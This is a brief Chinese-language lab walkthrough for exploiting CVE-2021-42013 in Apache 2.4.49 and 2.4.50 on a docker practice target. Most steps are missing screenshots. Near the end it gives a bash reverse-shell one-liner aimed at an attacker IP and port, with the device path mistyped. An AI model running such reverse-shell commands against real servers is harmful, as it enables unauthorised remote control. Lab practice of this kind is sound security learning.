影响版本

Apache 2.4.49
Apache 2.4.50

靶场搭建

使用docker搭建靶场环境:
docker pull vulfocus/apache-cve_2021_42013:latest  #拉取靶场
docker run -itd -p 80:80 vulfocus/apache-cve_2021_42013:latest ## 启动靶场环境

在这里插入图片描述
访问靶场环境

在这里插入图片描述
代码

在这里插入图片描述

在这里插入图片描述
利用工具进行代码利用
在这里插入图片描述
注意反弹shell级需要开启反弹端口
在这里插入图片描述

在这里插入图片描述
这里可以使用反弹shell命令
http://xx.xx.xx.xx
bash -i >& /dec/tcp/shell IP/端口 0>&1

Logo

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐